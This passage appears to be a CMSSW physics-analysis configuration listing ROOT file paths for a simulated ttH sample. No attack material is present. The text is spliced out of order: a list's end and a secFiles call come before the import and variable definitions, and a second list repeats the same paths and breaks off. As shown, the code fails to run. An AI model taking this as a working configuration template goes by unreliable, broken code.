    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D4EB5C31-C70B-E211-AC1B-002590200AD0.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D49F4B34-C70B-E211-99F4-0025B3E06400.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D2C6963C-C70B-E211-9D24-002590200908.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D26CAF3C-C70B-E211-A812-002590200930.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D026AE93-B90B-E211-9E76-002481E14D76.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/CCD8F139-C70B-E211-B2E8-003048D47A4C.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/CA85ABB8-D90B-E211-A2BB-001E67397E13.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/CA63512E-C70B-E211-8DDF-001E672CC1E7.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/C480E406-A90B-E211-8B58-001E67397D00.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/C0D5E949-9C0B-E211-A208-001E673967C5.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/C0D100AE-D90B-E211-8962-001E67396DBA.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/BCF27C36-C70B-E211-876B-002590200A6C.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/B4E711BB-D90B-E211-A42C-001E67396E3C.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/B2A005DE-D90B-E211-94B3-001E67397D91.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/AC3D508B-B90B-E211-AB8D-003048D45F2C.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/AAC74E91-B90B-E211-A9FF-002590200A98.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/AAAE1D0A-A90B-E211-907D-001E67398CB9.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/A89EA633-C70B-E211-AF12-0025902009A4.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/A836D251-C70B-E211-BFDD-0025902008E4.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/A448E095-E90B-E211-8CED-001E673969D2.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9EBE5A69-C70B-E211-A36E-001E67398E12.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9C84FAB1-D90B-E211-8EDF-001E67396874.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9AFA54C5-D90B-E211-9C13-001E67396568.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9A4A0F32-C70B-E211-A372-002590200898.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/94BE773D-C70B-E211-836F-001E67398CE1.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/944B6544-B90B-E211-920A-002481E1511E.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/90CBB57E-E90B-E211-AB2F-0025902009C0.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8E16A8F3-D90B-E211-83D6-002590200B0C.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8ACD8F9C-B90B-E211-8F86-002590200B4C.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8ABCBFC1-D90B-E211-9C77-002590200B68.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8AAE9A07-A90B-E211-ABCF-001E673967C5.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8A5DE24C-C70B-E211-9271-002590200988.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/88CA0942-C70B-E211-A894-0025B31E3CC0.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/7EFFEF3A-C70B-E211-A78B-001E67396A63.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/7CDD1A9C-B90B-E211-99CE-003048D45FD8.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/7A951BB1-D90B-E211-B97A-003048D476B4.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/78C1620C-A90B-E211-AF89-001E67396761.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/748AA33D-C70B-E211-AA21-001E67398390.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/74013EE7-D90B-E211-B929-001E673970C1.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/726A8A0A-A90B-E211-86C8-001E67397094.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/70698A49-C70B-E211-BE12-002590200A28.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6E05B863-C70B-E211-B476-002590200938.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6E03CAFF-D90B-E211-96B9-001E67396C52.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6CB7A769-C70B-E211-A569-002590200A80.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6C3E469D-B90B-E211-93ED-003048D45FE8.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/68D8E30B-A90B-E211-9884-003048673F24.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6644544A-C70B-E211-B9D8-001E67398E49.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/60FAAC62-9C0B-E211-B091-002590200B00.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5E932B7F-F60B-E211-A37C-001E67398C05.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5E2DFB9D-B90B-E211-8767-0025B31E3C3C.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5C9369BA-D90B-E211-AB39-001E67397396.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5485BB36-C70B-E211-A62A-002590200A98.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/54439593-B90B-E211-AF3D-001E67398011.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/540D144A-9C0B-E211-BE2D-001E67396C9D.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5087B43E-B90B-E211-834E-003048D45FB6.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/50119B4C-C70B-E211-BC7A-00259020083C.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4EBF2B87-B90B-E211-8020-003048D476C4.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4E90C544-B90B-E211-92CF-001E67396DCE.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4E42EA41-C70B-E211-89E7-002590200900.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4E24ECEB-D90B-E211-B732-001E67397CCE.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4A3C00E2-D90B-E211-81B6-0025902009B0.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/487FA490-B90B-E211-B401-003048D45FE8.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/46C80D32-C70B-E211-ADC0-003048D45F98.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4680304C-B90B-E211-9E05-003048D479F2.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4442750C-A90B-E211-982C-001E67396644.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/428A4E96-B90B-E211-8098-002590200B74.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4048B9E0-D90B-E211-AD88-001E67397B07.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3ECD1D4C-B90B-E211-BCE7-003048D46034.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3EA42648-9C0B-E211-96A1-001E673972F6.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3E5C2DB5-D90B-E211-AFAA-9C8E991A143E.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3C91E824-A90B-E211-A981-001E67397D00.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3AF523B1-D90B-E211-A075-001E67396BB7.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3A3BB131-C70B-E211-AE83-001E67396DB5.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3642D7AF-D90B-E211-A79C-0030486740BA.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/30A91F44-9C0B-E211-ABA7-001E6739811A.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/30897650-C70B-E211-9F69-0025902008D8.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/304AEF43-C70B-E211-8856-003048D45F98.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2E24DE3A-B90B-E211-ACC7-0025B3E06556.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2CE679E6-D90B-E211-B835-002590200B0C.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2C7439E9-D90B-E211-8919-002590200930.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2AFB4848-B90B-E211-A519-001E673965FE.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2A854B08-A90B-E211-9851-001E67397701.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2817039C-B90B-E211-9F8D-0025B31E3C58.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/241AF10A-A90B-E211-BB12-001E67397CCE.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/240A3B43-B90B-E211-BA5F-002481E14FFC.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/20986287-B90B-E211-942A-003048D47A4C.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/1EB30D07-DA0B-E211-BE8F-001E67398E62.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/1E2DEC38-B90B-E211-B323-003048D476C2.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/1C490588-B90B-E211-99B7-003048D45FAE.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0E69E144-B90B-E211-AFD2-0025B3E05DB6.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0CF5EAB8-D90B-E211-AD4B-002590200AD0.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0CBE6239-B90B-E211-8155-001E67396A18.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/08A93150-9C0B-E211-9BF5-001E67396EAA.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0639D68C-B90B-E211-953D-003048D4609E.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/060DDA6A-C70B-E211-BF0C-001E67396D4C.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/02C8D108-DA0B-E211-8141-001E67397396.root',
    '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0078C0C1-D90B-E211-83A4-001E67396E32.root',
])
# This sample needs no secondary (parent) files.
secFiles.extend([])
# ---------------------------------------------------------------------------
import FWCore.ParameterSet.Config as cms

# Run over the full dataset: -1 means no event limit.
maxEvents = cms.untracked.PSet(input=cms.untracked.int32(-1))

# Input file lists, filled by the extend() calls below; PoolSource reads
# the primary files and falls back to the (empty) secondary list.
readFiles = cms.untracked.vstring()
secFiles = cms.untracked.vstring()
source = cms.Source(
    'PoolSource',
    fileNames=readFiles,
    secondaryFileNames=secFiles,
)
readFiles.extend([
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/FE26AAB2-D90B-E211-AD0F-0025902009B8.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/FCB6A333-C70B-E211-8C99-001E67396D51.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/FA9CB2B5-D90B-E211-82B1-001E67397B07.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F8F81697-E90B-E211-9A48-002590200834.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F88B7838-C70B-E211-8971-001E673968F1.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F6481280-E90B-E211-8349-002590200B34.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F4DAB680-B90B-E211-BE7E-003048D47A6C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F2F3F436-C70B-E211-A3A4-002481E1511E.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F03693B3-D90B-E211-8CFB-001E67398633.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EEF20E3B-C70B-E211-953A-002590200970.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EEA69380-E90B-E211-833A-002590200970.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EE92E708-A90B-E211-BE6A-001E67397B07.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EC8A6530-C70B-E211-9D59-002590200840.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EAE34E85-B90B-E211-B5AD-003048673F3A.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EACF738F-E90B-E211-8D44-00259020081C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/E43E9F40-C70B-E211-8CFE-001E67396644.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DEF585B4-D90B-E211-AD4B-002590200B38.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DE991237-C70B-E211-A065-001E67397003.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DE69B13F-B90B-E211-A320-002481E1511E.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DCDE4B42-C70B-E211-9F88-003048D4602A.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DC7EDE05-A90B-E211-B465-0025902008F4.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DAFF741D-A90B-E211-B24E-001E673969D2.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D865D241-B90B-E211-A391-003048673F26.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D6C4A74C-C70B-E211-B449-003048D45F78.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D4EB5C31-C70B-E211-AC1B-002590200AD0.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D49F4B34-C70B-E211-99F4-0025B3E06400.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D2C6963C-C70B-E211-9D24-002590200908.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D26CAF3C-C70B-E211-A812-002590200930.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D026AE93-B90B-E211-9E76-002481E14D76.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/CCD8F139-C70B-E211-B2E8-003048D47A4C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/CA85ABB8-D90B-E211-A2BB-001E67397E13.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/CA63512E-C70B-E211-8DDF-001E672CC1E7.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/C480E406-A90B-E211-8B58-001E67397D00.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/C0D5E949-9C0B-E211-A208-001E673967C5.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/C0D100AE-D90B-E211-8962-001E67396DBA.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/BCF27C36-C70B-E211-876B-002590200A6C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/B4E711BB-D90B-E211-A42C-001E67396E3C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/B2A005DE-D90B-E211-94B3-001E67397D91.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/AC3D508B-B90B-E211-AB8D-003048D45F2C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/AAC74E91-B90B-E211-A9FF-002590200A98.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/AAAE1D0A-A90B-E211-907D-001E67398CB9.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/A89EA633-C70B-E211-AF12-0025902009A4.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/A836D251-C70B-E211-BFDD-0025902008E4.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/A448E095-E90B-E211-8CED-001E673969D2.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9EBE5A69-C70B-E211-A36E-001E67398E12.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9C84FAB1-D90B-E211-8EDF-001E67396874.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9AFA54C5-D90B-E211-9C13-001E67396568.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9A4A0F32-C70B-E211-A372-002590200898.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/94BE773D-C70B-E211-836F-001E67398CE1.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/944B6544-B90B-E211-920A-002481E1511E.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/90CBB57E-E90B-E211-AB2F-0025902009C0.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8E16A8F3-D90B-E211-83D6-002590200B0C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8ACD8F9C-B90B-E211-8F86-002590200B4C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8ABCBFC1-D90B-E211-9C77-002590200B68.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8AAE9A07-A90B-E211-ABCF-001E673967C5.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8A5DE24C-C70B-E211-9271-002590200988.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/88CA0942-C70B-E211-A894-0025B31E3CC0.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/7EFFEF3A-C70B-E211-A78B-001E67396A63.root'
